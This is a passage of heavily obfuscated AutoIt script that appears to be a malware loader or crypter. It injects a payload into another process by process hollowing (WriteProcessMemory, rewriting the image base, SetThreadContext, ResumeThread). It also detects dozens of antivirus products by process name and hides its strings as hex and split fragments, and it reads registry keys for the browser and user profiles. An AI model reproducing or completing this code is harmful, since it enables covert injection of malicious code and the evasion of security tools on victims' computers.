699. If $zmqhxaze895g8ieuyxjymibxbevy1lyrqyech AND $wkkz3rasb01j Then $yjpgyvsyamgsnrwji = True
700. $ohug55t6wkqrzcywe8 += ((((((-19 + (0 + -2)) * 2) / Int(Chr("54"))) * -5) - ((-1 + -31) - -111)) * (Dec("2") + (16 / -4)))
701. Local $ao8hqhjerekhtrm4ibqjzxiuq81qtkeu72
702. Local $9eg6qismk48f2dexizujquoy3t
703. If $yjpgyvsyamgsnrwji Then
704. $9eg6qismk48f2dexizujquoy3t = ztcpagvsrzpo($mpodnfy6il, $rqr75skrbzzbitd4vhr)
705. If @error Then
706. $9eg6qismk48f2dexizujquoy3t = oz_xgvhffmrfbaoqtcyzzbhpehbysxguyrniouhmu($mpodnfy6il, $dcda6qowuym57zfqucadzu, $rqr75skrbzzbitd4vhr)
707. If @error Then
708. ttoltiicmgfiojuqigpzcqvdskcnrs($mpodnfy6il, $dcda6qowuym57zfqucadzu)
709. $9eg6qismk48f2dexizujquoy3t = oz_xgvhffmrfbaoqtcyzzbhpehbysxguyrniouhmu($mpodnfy6il, $dcda6qowuym57zfqucadzu, $rqr75skrbzzbitd4vhr)
710. If @error Then
711. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
712. Return SetError(-101, (0 + (0 + 1)), 0)
713. EndIf
714. EndIf
715. EndIf
716. $ao8hqhjerekhtrm4ibqjzxiuq81qtkeu72 = True
717. Else
718. $9eg6qismk48f2dexizujquoy3t = oz_xgvhffmrfbaoqtcyzzbhpehbysxguyrniouhmu($mpodnfy6il, $dcda6qowuym57zfqucadzu, $rqr75skrbzzbitd4vhr)
719. If @error Then
720. ttoltiicmgfiojuqigpzcqvdskcnrs($mpodnfy6il, $dcda6qowuym57zfqucadzu)
721. $9eg6qismk48f2dexizujquoy3t = oz_xgvhffmrfbaoqtcyzzbhpehbysxguyrniouhmu($mpodnfy6il, $dcda6qowuym57zfqucadzu, $rqr75skrbzzbitd4vhr)
722. If @error Then
723. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
724. Return SetError((55 + -156), 0, 0)
725. EndIf
726. EndIf
727. EndIf
728. DllStructSetData($g8f8je6pbziltsqw5knrzmgj, "Imag" & "eB" & "a" & "s" & "e", $9eg6qismk48f2dexizujquoy3t)
729. Local $6g0vogi1bkc1ipdt4u9vwyvgeov3 = DllStructCreate(sctrlw_uspabvkwcwrpunedkkotxwp_mmjamcirofjdjbuv() & $rqr75skrbzzbitd4vhr & BinaryToString("0X" & "5D"))
730. Local $xdl1fupjkev5krgwcnqdylzcolqcweuhcx5 = DllStructGetPtr($6g0vogi1bkc1ipdt4u9vwyvgeov3)
731. Local $64meuufoqbfen3fqwm47eynujji3duc4x = DllStructCreate("b" & "y" & "t" & "e[" & $kmqdusdqnhmsmalt7rg & gpogoodvlz(), $dbq90hhmy9udn0gcdyuunqrcbf3ixuu2)
732. DllStructSetData($6g0vogi1bkc1ipdt4u9vwyvgeov3, 1, DllStructGetData($64meuufoqbfen3fqwm47eynujji3duc4x, Dec("1")))
733. Local $ewiqkvwf8n7bwqp
734. Local $cmhvcmmlekubjry, $res0ynexuq5b0k
735. Local $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf, $xprv2mbi8uxrkqufzgulrapum
736. Local $p7znx8sxgciwgj63diilffosgdbxeztald4klkp
737. For $fz3eclo13c4hpsztvduuwn10gcs = StringLen("q") To $fpim71aquxa3tneqfcvmw5
738. $ewiqkvwf8n7bwqp = DllStructCreate("char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRa" & "wData;dword P" & "ointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;word NumberOfRelocations;wo" & "rd NumberOfLinenumbers;dword Characteristics", $ohug55t6wkqrzcywe8)
739. $cmhvcmmlekubjry = DllStructGetData($ewiqkvwf8n7bwqp, BinaryToString("0x53697A654F6652617744617461", 1))
740. $res0ynexuq5b0k = $dbq90hhmy9udn0gcdyuunqrcbf3ixuu2 + DllStructGetData($ewiqkvwf8n7bwqp, "Poi" & "n" & "t" & "er" & BinaryToString(BinaryToString("0X3078353436463532363137373434")) & "ata")
741. $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf = DllStructGetData($ewiqkvwf8n7bwqp, BinaryToString("0X5669727475616c41646472657373", 1))
742. $xprv2mbi8uxrkqufzgulrapum = DllStructGetData($ewiqkvwf8n7bwqp, "UnionOfVirt" & "ualSizeAndPhysic" & "a" & "lAddres" & "s")
743. If $xprv2mbi8uxrkqufzgulrapum AND $xprv2mbi8uxrkqufzgulrapum < $cmhvcmmlekubjry Then $cmhvcmmlekubjry = $xprv2mbi8uxrkqufzgulrapum
744. If $cmhvcmmlekubjry Then
745. DllStructSetData(DllStructCreate(slahotvinldyeippqggxgqslytgxrmokfmby() & $cmhvcmmlekubjry & BinaryToString("0" & "x" & "5D"), $xdl1fupjkev5krgwcnqdylzcolqcweuhcx5 + $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf), StringLen("S"), DllStructGetData(DllStructCreate(dk_vmwfymcqhofyugmhpddqxooqcvdwehwcvkmqiu() & $cmhvcmmlekubjry & _wghyt_xlcssv_xhvthilhalockwjvbaobkufvwyigqbobcyr(), $res0ynexuq5b0k), Int(ChrW("49"))))
746. EndIf
747. If $ao8hqhjerekhtrm4ibqjzxiuq81qtkeu72 Then
748. If $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf <= $zmqhxaze895g8ieuyxjymibxbevy1lyrqyech AND $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf + $cmhvcmmlekubjry > $zmqhxaze895g8ieuyxjymibxbevy1lyrqyech Then
749. $p7znx8sxgciwgj63diilffosgdbxeztald4klkp = DllStructCreate(BinaryToString("0X627" & "974655" & "B", 1) & $wkkz3rasb01j & BinaryToString(BinaryToString("0X30583564", Dec("1", 0)), 1), $res0ynexuq5b0k + ($zmqhxaze895g8ieuyxjymibxbevy1lyrqyech - $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf))
750. EndIf
751. EndIf
752. $ohug55t6wkqrzcywe8 += (400 / 10)
753. Next
754. If $ao8hqhjerekhtrm4ibqjzxiuq81qtkeu72 Then sfzl_onbyjsysrkquujnmoxne_apoyk_blhyjitmg_wpu($xdl1fupjkev5krgwcnqdylzcolqcweuhcx5, $p7znx8sxgciwgj63diilffosgdbxeztald4klkp, $9eg6qismk48f2dexizujquoy3t, $dcda6qowuym57zfqucadzu, $qoprlnm43nhjgqsgv7ljl2nxlt64uomupiww = 523)
755. $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $mpodnfy6il, "ptr", $9eg6qismk48f2dexizujquoy3t, "ptr", $xdl1fupjkev5krgwcnqdylzcolqcweuhcx5, "dword_ptr", $rqr75skrbzzbitd4vhr, "dword_ptr*", 0)
756. If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
757. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
758. Return SetError((1 * -7), 0, 0)
759. EndIf
760. Local $ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr = DllStructCreate("byte InheritedAddressSpace;byte ReadImageFileExecOptions;byte BeingDebugged;byte Spare;ptr Mutant;ptr ImageBaseAddress;ptr LoaderData;ptr ProcessParameters;ptr SubSystemData;ptr ProcessHeap;ptr FastPebLock;ptr FastPebLockRoutine;ptr FastPebUnlockRoutine;dword EnvironmentUpdateCount;ptr KernelCallbackTable;ptr EventLogSection;ptr EventLog;ptr FreeList;dword TlsExpansionCounter;ptr TlsBitmap;dword TlsBitmapBits[2];ptr ReadOnlySharedMemoryBase;ptr ReadOnlySharedMemoryHeap;ptr ReadOnlyStaticServerData;ptr AnsiCodePageData;ptr OemCodePageData;ptr UnicodeCaseTableData;dword NumberOfProcessors;dword NtGlobalFlag;byte Spare2[4];int64 CriticalSectionTimeout;dword HeapSegmentReserve;dword HeapSegmentCommit;dword HeapDeCommitTotalFreeThreshold;dword HeapDeCommitFreeBlockThreshold;dword NumberOfHeaps;dword MaximumNumberOfHeaps;ptr ProcessHeaps;ptr GdiSharedHandleTable;ptr ProcessStarterHelper;ptr GdiDCAttributeList;ptr LoaderLock;dword OSMajorVersion;dword OSMinorVersion;dword OSBuildNumber;dword OSPlatformId;dword ImageSubSystem;dword ImageSubSystemMajorVersion;dword ImageSubSystemMinorVersion;dword GdiHandleBuffer[34];dword PostProcessInitRoutine;dword TlsExpansionBitmap;byte TlsExpansionBitmapBits[128];dword SessionId")
761. $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "ptr", $mpodnfy6il, "ptr", $yzgdgl23pjntj01ciziqamkinpqstmpb6lvpplr, "ptr", DllStructGetPtr($ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr), "dword_ptr", DllStructGetSize($ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr), "dword_ptr*", 0)
762. If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
763. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
764. Return SetError(((4 / (1 * (Dec("2", 0) / -1))) * (1 + 3)), 0, 0)
765. EndIf
766. DllStructSetData($ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr, "I" & "ma" & "ge" & "B" & "as" & "eA" & "ddress", $9eg6qismk48f2dexizujquoy3t)
767. $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $mpodnfy6il, "ptr", $yzgdgl23pjntj01ciziqamkinpqstmpb6lvpplr, "ptr", DllStructGetPtr($ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr), "dword_ptr", DllStructGetSize($ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr), "dword_ptr*", 0)
768. If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
769. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
770. Return SetError((1 * ((-3 + 0) * 3)), 0, 0)
771. EndIf
772. Switch $jbkokjcudb2o5m8caztuwg2owxt1a5oc0
773. Case (-1 - ((2 / -1) / ((0 + -1) - -2)))
774. DllStructSetData($bbldic83pit5sf, fgtrgwgpfjpicdjldojqm(), $9eg6qismk48f2dexizujquoy3t + $zuinpjpxoem5ozdk2fmoujsnly2lma34v2voq5atmkqm)
775. Case (2 - 0)
776. DllStructSetData($bbldic83pit5sf, qhdcazedjxsqolohpguzcltkoait(), $9eg6qismk48f2dexizujquoy3t + $zuinpjpxoem5ozdk2fmoujsnly2lma34v2voq5atmkqm)
777. EndSwitch
778. $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "SetThreadContext", "handle", $gk43ktboa7b, "ptr", DllStructGetPtr($bbldic83pit5sf))
779. If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
780. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
781. Return SetError((-6 + (Int(Chr("49")) * -4)), 0, 0)
782. EndIf
783. $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $gk43ktboa7b)
784. If @error OR $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] = -Dec("1", 0) Then
785. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
786. Return SetError((-3 + -8), 0, 0)
787. EndIf
788. DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $mpodnfy6il)
789. DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $gk43ktboa7b)
790. Return DllStructGetData($lvex13kltf6ptj, "Proce" & "ssId")
791. EndFunc
792.  
793. Func rwhsslzitoetfswiuloifcmzvndt_alg()
794. Return "0x5C"
795. EndFunc
796.  
797. Func jdqcjfagpdamtypfmszjphaexec()
798. Return "46f777320"
799. EndFunc
800.  
801. Func lwkbknwltfwrl()
802. Local $ugiflkt87iosojdbzq5ibygxiuzdwybpdseg0esk6oaqnyryos = BinaryToString("0x7c")
803. Return $ugiflkt87iosojdbzq5ibygxiuzdwybpdseg0esk6oaqnyryos
804. EndFunc
805.  
806. Func ingfcooqsfxecrya()
807. Local $zjvkqclyx2viiihm
808. $zjvkqclyx2viiihm = "="
809. Return $zjvkqclyx2viiihm
810. EndFunc
811.  
812. Func ujthcdgsfonaohqptubzgrvvrjiwidzohg()
813. Local $xjtg5m4ckpdxvnm96d7mgwdvtv9jywybbkp9ntxglmojp17
814. $xjtg5m4ckpdxvnm96d7mgwdvtv9jywybbkp9ntxglmojp17 = BinaryToString("0x5c544d50", 1)
815. Return $xjtg5m4ckpdxvnm96d7mgwdvtv9jywybbkp9ntxglmojp17
816. EndFunc
817.  
818. Func ncsv_axwhwanqqdyepezikkiinqlpqmecxpbufbt()
819. Local $e7fwgtlafughctlzfdvemzouzyne7jpvwawbwrw = zxgmerfrsgboyotstop_ixnjnzoraurlhnccbizvn()
820. Return $e7fwgtlafughctlzfdvemzouzyne7jpvwawbwrw
821. EndFunc
822.  
823. Func zzhrcnq_fwbaelobsmnjjpovbirfjknocxl_kumlscerrsgyg()
824. Local $o2rywg0zlrjv8fryqxpfxkkovsnhplj3qjj4ec
825. $o2rywg0zlrjv8fryqxpfxkkovsnhplj3qjj4ec = kr_drkpz_bhvyf()
826. Return $o2rywg0zlrjv8fryqxpfxkkovsnhplj3qjj4ec
827. EndFunc
828.  
829. Func pseqreglybhqq()
830. Local $2nd573ze713wenmeb, $u32zuumkfm, $904rzo39nzbanhwyox42pfhbcs8j9gyyw8
831. $2nd573ze713wenmeb = FileFindFirstFile(@WindowsDir & BinaryToString("0X5C4D6963726F736F66742E4E45545C4672616D65776F726B5C2A", (-1 / (1 / ((1 + 0) - (StringLen("i") * (-2 + 4)))))))
832. While 1
833. $u32zuumkfm = FileFindNextFile($2nd573ze713wenmeb)
834. If @error Then ExitLoop
835. If StringLeft($u32zuumkfm, (StringLen("G") / Dec("1", 0))) = aaadoegqsiyxujnrxwdhaeuqcetd_pxtcmur() Then $904rzo39nzbanhwyox42pfhbcs8j9gyyw8 &= $u32zuumkfm & '"' & "," & '"'
836. WEnd
837. FileClose($2nd573ze713wenmeb)
838. Return BinaryToString("0X5b22", 1) & StringLeft($904rzo39nzbanhwyox42pfhbcs8j9gyyw8, StringLen($904rzo39nzbanhwyox42pfhbcs8j9gyyw8) - 2) & BinaryToString("0X5d", StringLen("F"))
839. EndFunc
840.  
841. Func vyniphfzozthprpzbfrh()
842. Return "0x626473657276696365686F73742E657865"
843. EndFunc
844.  
845. Func jdzczmqtjmzmqepmsmkrdmxzrboakzth()
846. Return poieranvshdqmkipghxvzyhwefhrdfirexfdwqq()
847. EndFunc
848.  
849. Func khafkkhqtszrrefksmbbhsfidtcporlvzkfqmagvxj()
850. Local $4cxb0qb9pxkxs7q = BinaryToString("0X" & "5" & "d", 1)
851. Return $4cxb0qb9pxkxs7q
852. EndFunc
853.  
854. Func iualvpsgxxxmczelpvwhhblqmrotgxagf()
855. Return BinaryToString("0x557365722D4167656E74")
856. EndFunc
857.  
858. Func aaadoegqsiyxujnrxwdhaeuqcetd_pxtcmur()
859. Local $eqhrjjqqkpsl
860. $eqhrjjqqkpsl = BinaryToString(BinaryToString("0x30783736", 1))
861. Return $eqhrjjqqkpsl
862. EndFunc
863.  
864. Func gkwmmakclfebkghimfpthtxvuerfwzzsitggjuxm_g_vwtl()
865. Local $pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7
866. If @OSArch = BinaryToString(BinaryToString("0x" & "30" & "583" & "5383" & _ixyqesfzzyfsjthlbixz() & "34", (Int(ChrW("49")) / Dec("1", 0))), (0 + ((((Dec("1", 0) / -1) - (-2 - 0)) - 0) / Dec("1")))) OR @OSArch = cnjjtpqkz_camfbid() Then
867. $pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7 = RegRead(BinaryToString("0x484b45595f4c4f43414c5f4d414348494e4536345c534f4654574152455c4d6963726f736f66745c57696e646f7773204e545c43757272656e7456657273696f6e5c57696e736174", StringLen("D")), "Primar" & "yAdap" & "terStrin" & "g")
868. Else
869. $pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7 = RegRead(BinaryToString(BinaryToString(BinaryToString("0X30783330353833343338333434323334333533353339333534363334343333343436333433333334333133343433333534363334343433343331333433333334333833343339333434353334333533353433333533333334343633343336333533343335333733343331333533323334333533353433333434343336333933363333333733323336343633373333333634363336333633373334333534333335333733363339333634353336333433363436333733373337333333323330333434353335333433353433333433333337333533373332333733323336333533363435333733343335333633363335333733323337333333363339333634363336343533353433333533373336333933363435333733333336333133373334"))), "PrimaryAda" & "pter" & omubxoacpbjouqbwuxbryxqhllqtgz_epoflhzfebdbo() & "ng")
870. EndIf
871. Return $pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7
872. EndFunc
873.  
874. Func qyhpgtxpkraadh()
875. Local $tdf7lrskkl5j0b7yxfai6dtscvensotrqar2yck
876. $tdf7lrskkl5j0b7yxfai6dtscvensotrqar2yck = edis_boeogplxillynpbcevhtntqnzpqwo()
877. Return $tdf7lrskkl5j0b7yxfai6dtscvensotrqar2yck
878. EndFunc
879.  
880. Func qlgskympacaenl_h()
881. Local $ep9yioquerq2qbhpcui2kbtgxbjdlenfqtuxdkplj7bx4uidhs = BinaryToString("0x44617461", 1)
882. Return $ep9yioquerq2qbhpcui2kbtgxbjdlenfqtuxdkplj7bx4uidhs
883. EndFunc
884.  
885. Func iilyuxbwugiyndbi_snmefwtscqk_sxeccoijdjxbjbwevq()
886. Return bnsvysdmfcvpyfc()
887. EndFunc
888.  
889. Func xdqvxgxlcatewxloqidvcepi_etcerfsukjozy()
890. Return "avp.exe"
891. EndFunc
892.  
893. Func eqthjdpjctukuvfcwxdavsgaev_jylxzpvazvjruq()
894. Local $st6v26khfayo02mm4uty0la4hbfik62cvuomgzn9hqkidus6s = "AVE"
895. Return $st6v26khfayo02mm4uty0la4hbfik62cvuomgzn9hqkidus6s
896. EndFunc
897.  
898. Func jaakxppmkhkxwqojpsspinssziyccckzlfzh()
899. Local $7vltbhqt8mg5hzcvnwpuqdyl1xc4jxazmtjxwy6pe
900. $7vltbhqt8mg5hzcvnwpuqdyl1xc4jxazmtjxwy6pe = "n" & "avap" & "s" & "vc" & ".exe"
901. Return $7vltbhqt8mg5hzcvnwpuqdyl1xc4jxazmtjxwy6pe
902. EndFunc
903.  
904. Func ppmcdosepfdovocapnawwmitxeolhobtjphdjznqbrrrbi()
905. Return "\"
906. EndFunc
907.  
908. Func wosiyabviqgshcpdjsloinxncqrohwqkgqopism($scfx7p4vptwqhzy0fp4)
909. Local $wberil45yllmiey1iokfjbehvcygbcitleksw, $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy
910. $wberil45yllmiey1iokfjbehvcygbcitleksw = ""
911. For $fz3eclo13c4hpsztvduuwn10gcs = 1 To StringLen($scfx7p4vptwqhzy0fp4)
912. $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy = Asc(StringMid($scfx7p4vptwqhzy0fp4, $fz3eclo13c4hpsztvduuwn10gcs, 1))
913. Select
914. Case ($8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy >= (((((0 - 1) + -11) / 2) * (2 / (1 - (Dec("4") / (((-2 * (-1 + -1)) / 1) / Int(ChrW("50"))))))) * 4) AND $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy <= Dec("39")) OR ($8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy >= ((10 + Int(Chr("51"))) * Dec("5")) AND $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy <= (((-7 - 2) - (9 / 1)) * ((0 - Dec("2", 0)) - (Int(Chr("51")) / (-1 / -1))))) OR ($8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy >= Dec("61", 0) AND $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy <= (((-61 * 43) / 43) * ((1 / (1 + 0)) * (0 - ((1 / (Dec("1", 0) / ((1 - StringLen("mj")) + 2))) - (-1 - 0))))))
915. $wberil45yllmiey1iokfjbehvcygbcitleksw = $wberil45yllmiey1iokfjbehvcygbcitleksw & StringMid($scfx7p4vptwqhzy0fp4, $fz3eclo13c4hpsztvduuwn10gcs, 1)
916. Case $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy = StringLen("_iEozRJ3YXgFG91i1kxO-K8BXS4FSDgI")
917. $wberil45yllmiey1iokfjbehvcygbcitleksw = $wberil45yllmiey1iokfjbehvcygbcitleksw & "+"
918. Case Else
919. $wberil45yllmiey1iokfjbehvcygbcitleksw = $wberil45yllmiey1iokfjbehvcygbcitleksw & szr_hfbbpvvgvj() & Hex($8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy, Int(ChrW("50")))
920. EndSelect
921. Next
922. Return $wberil45yllmiey1iokfjbehvcygbcitleksw
923. EndFunc
924.  
925. Func yztyxziqfquxjsxbnazibqiuotbyngsynzahzw()
926. Return "0X416464726573734F664E6577457865486561646572"
927. EndFunc
928.  
929. Func mnwumtdbranfjd()
930. Local $j0d5kpayexhfnhunvimiutufw55brcxrmwu3s5jz5iud1b = "0x2d64"
931. Return $j0d5kpayexhfnhunvimiutufw55brcxrmwu3s5jz5iud1b
932. EndFunc
933.  
934. Func ncjarabtnfcct()
935. Local $ygvumseebbishyz4l8bf0hp8mnadukytirr1j2fucweg = BinaryToString("0x6d63736869656c642e657865", 1)
936. Return $ygvumseebbishyz4l8bf0hp8mnadukytirr1j2fucweg
937. EndFunc
938.  
939. Func fensfnhdrdkxblmgwgwpiycieiwng()
940. Return hygfsjgpza()
941. EndFunc
942.  
943. Func fnhghgdwwyegz_uffrjftibmfxyhmifvsxmonefwem()
944. Return BinaryToString("0X3d")
945. EndFunc
946.  
947. Func kmhvbrvryeyqedovmbdbsbkilgmkcukdmmvk()
948. Local $4gkzstnhi3gu = 0
949. If ProcessExists("Avas" & "tSvc." & "exe") OR ProcessExists(BinaryToString("0X617665736572766963652E657865")) OR ProcessExists(nhmtqsdhdgeimlif()) OR ProcessExists("AvastU" & "I.ex" & "e") Then $4gkzstnhi3gu = (((0 - 2) - ((20 + -116) / (-5 - StringLen("c!?")))) + Dec("20", 0))
950. If ProcessExists(BinaryToString(BinaryToString("0x30583631373636373265363537383635"))) OR ProcessExists(nv_borpqgeaixjlprncpywbsgweqp()) OR ProcessExists(BinaryToString(BinaryToString("0x3" & "07836313736363737353" & "6393265363537383635", 1), StringLen("M"))) OR ProcessExists(BinaryToString(zvfemlxfgjseznsojvjozicrnghtsvsrmjvhylylukereztt(), (((-1 / 1) / Int(Chr("49"))) - (2 / -1)))) Then $4gkzstnhi3gu = (StringLen("!0jM8Vj81Wm9Dx") + Int(ChrW(51)))
951. If ProcessExists(ja_eftkmxypsfrlzelslpstbcdvlmlwowcbk()) OR ProcessExists(BinaryToString("0x6176736861646f772e657865", StringLen("r"))) OR ProcessExists("a" & "v" & "gnt." & "exe") OR ProcessExists("Avi" & "ra.Service" & "Host" & ".exe") OR ProcessExists("Avira" & "." & "Sy" & BinaryToString("0x73747261792E65") & "xe") Then $4gkzstnhi3gu = Dec("10", 0)
952. If ProcessExists(glgmpfzsipekhiwmtavlmgypd()) OR ProcessExists(vxmdryesvdsvpmndwbrmgperdotapac()) OR ProcessExists(wsc_uhnwqvuubucj()) Then $4gkzstnhi3gu = Dec("F")
953. If ProcessExists("cla" & "mav." & "exe") Then $4gkzstnhi3gu = 14
954. If ProcessExists(fensfnhdrdkxblmgwgwpiycieiwng()) OR ProcessExists(BinaryToString(feaeizqavjgibpxnqxqn_ltkbmg(), Int(Chr("49")))) Then $4gkzstnhi3gu = (-1 * (5 + -18))
955. If ProcessExists(BinaryToString("0X6477656E67696E652E657865")) Then $4gkzstnhi3gu = Dec("C")
956. If ProcessExists("f" & "p" & "avse" & "rver" & ".exe") Then $4gkzstnhi3gu = 11
957. If ProcessExists("fs" & "ma." & "exe") OR ProcessExists(hpqrzftlekykdcvohfanyagilwgvisvgou_()) OR ProcessExists(BinaryToString("0X6673736d", (1 / (1 / Dec("1")))) & "3" & "2.exe") Then $4gkzstnhi3gu = StringLen("hVS3KY8h87")
958. If ProcessExists(jxiwwibqksiitsmcweyfjpqnepklabadschr()) OR ProcessExists(BinaryToString("0X61766b6" & "36c2e65" & "7865", 1)) Then $4gkzstnhi3gu = 9
959. If ProcessExists(xdqvxgxlcatewxloqidvcepi_etcerfsukjozy()) OR ProcessExists(hidxeulzzhaepspsnqdmgj()) OR ProcessExists("klb" & "lm" & "a" & "in" & ".exe") Then $4gkzstnhi3gu = ((7 - 23) / (0 - 2))
960. If ProcessExists("alogse" & "rv" & ".exe") OR ProcessExists(ncjarabtnfcct()) OR ProcessExists("w" & "e" & "bsc" & "anx" & ".ex" & "e") OR ProcessExists(ppexiuwxlsnolyxvz()) OR ProcessExists(emkwvmcvdwchvlggjh()) Then $4gkzstnhi3gu = (((Int(Chr("49")) + (-4 + 0)) - 1) - (-1 * ((0 - -11) + 0)))
961. If ProcessExists("m" & "smp" & "svc." & "exe") OR ProcessExists(kyiemgvkglcbwefrbffhahvbkmbstpdibcseshweafd()) OR ProcessExists(BinaryToString("0x6D7373656365732E657865")) Then $4gkzstnhi3gu = StringLen("mrcuQS")
962. If ProcessExists(_lozqicnyrbvrlrvmyjguexpic()) OR ProcessExists(BinaryToString("0x656775692E657865")) Then $4gkzstnhi3gu = (3 - (0 - 2))
963. If ProcessExists(BinaryToString("0X6e6f72746f" & "6e7365637572697" & "4792e657865", (-1 - ((((0 - -2) + (-1 * 4)) + -2) / 2)))) OR ProcessExists(xsnldvsghfqrnaziwurph_rwvjbmrdkhohwwnyzcrq() & "ch" & "." & "exe") OR ProcessExists(jaakxppmkhkxwqojpsspinssziyccckzlfzh()) OR ProcessExists(BinaryToString("0x767074726" & "1792e" & "657865", StringLen("m"))) OR ProcessExists(BinaryToString(rjwmrhlmatm_kqymunbmcrtqlxi(), (-1 + Int(ChrW("50"))))) Then $4gkzstnhi3gu = StringLen("WduH")
964. If ProcessExists("P" & BinaryToString("0x5341") & "N" & "Hos" & "t" & ".exe") OR ProcessExists("PSU" & "A" & "Ser" & "vice.exe") OR ProcessExists("p" & "sh" & "os" & "t" & ".exe") OR ProcessExists("pav" & "sr" & "v" & ".exe") OR ProcessExists(eqthjdpjctukuvfcwxdavsgaev_jylxzpvazvjruq() & "NGINE." & "EX" & "E") Then $4gkzstnhi3gu = Int(Chr("51"))
965. If ProcessExists("sa" & "vservi" & "ce.exe") Then $4gkzstnhi3gu = (1 + Int(Chr("49")))
966. If ProcessExists(quwr_cuqmepkglf()) Then $4gkzstnhi3gu = Dec("1", 0)
967. Return $4gkzstnhi3gu
968. EndFunc
969.  
970. Func odbwdthckanzhiurcsgerwf()
971. Local $vojlxdszkukib9pl85hu = '"'
972. Return $vojlxdszkukib9pl85hu
973. EndFunc
974.  
975. Func wsc_uhnwqvuubucj()
976. Local $jbxnzldm4yu8htnf5xyjhnpitt2jf6go2vvs3qdtkwjyvdbhfl = "bdagex" & "ec." & "exe"
977. Return $jbxnzldm4yu8htnf5xyjhnpitt2jf6go2vvs3qdtkwjyvdbhfl
978. EndFunc
979.  
980. Func napcxlnzritfccozuamlxc_pofjkghdknxvhi()
981. Local $snufcglovj8y87lm
982. $snufcglovj8y87lm = "0x20"
983. Return $snufcglovj8y87lm
984. EndFunc
985.  
986. Func ibvdmowumouqexuaqhujgyxbndf()
987. Local $pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7 = RegRead("HKEY" & "_C" & "LASS" & "ES" & "_ROOT\HTTP\shell\o" & "pen\command\", "")
988. Return StringMid($pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7, (Dec("1", 0) * (2 - 0)), StringInStr($pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7, ugwrxlngxiz()) + Dec("2"))
989. EndFunc
990.  
991. Func gskybmwosfhcjgxfghszalc($mpodnfy6il)
992. Local $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "IsWow64Process", "handle", $mpodnfy6il, "bool*", 0)
993. If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then Return SetError(Dec("1", 0), 0, 0)
994. Return $gwzzqtmpqf7zmwclp1y5ow17jx7g[Int(Chr(50))]
995. EndFunc
996.  
997. Func wrwejjcgkvla()
998. Return "schtasks /Query"
999. EndFunc
1000.  
1001. Func ulcjgcxrffja_ogbqabrjwmegnxnvrbqb()
1002. Local $lihrzkscycbxvinx
1003. $lihrzkscycbxvinx = "0X5c"
1004. Return $lihrzkscycbxvinx
1005. EndFunc
1006.  
1007. Func utwzvlwnpjfcyysqnef_fajgswzbofkjhedzao_v()
1008. Return "HK" & "EY_LOCAL_MACHINE64\SOFTWAR" & "E\Microsoft\Wi" & "ndows NT\Curren" & "tVersion\ProfileList\"
1009. EndFunc
1010.  
1011. Func tqndkbjzndxcqlnotvrehifjxuszgwhmzu()
1012. Return BinaryToString("0" & "X" & "5C")
1013. EndFunc
1014.  
1015. Func ezysl_kfjvhamboowzltqujiznkwtexb()
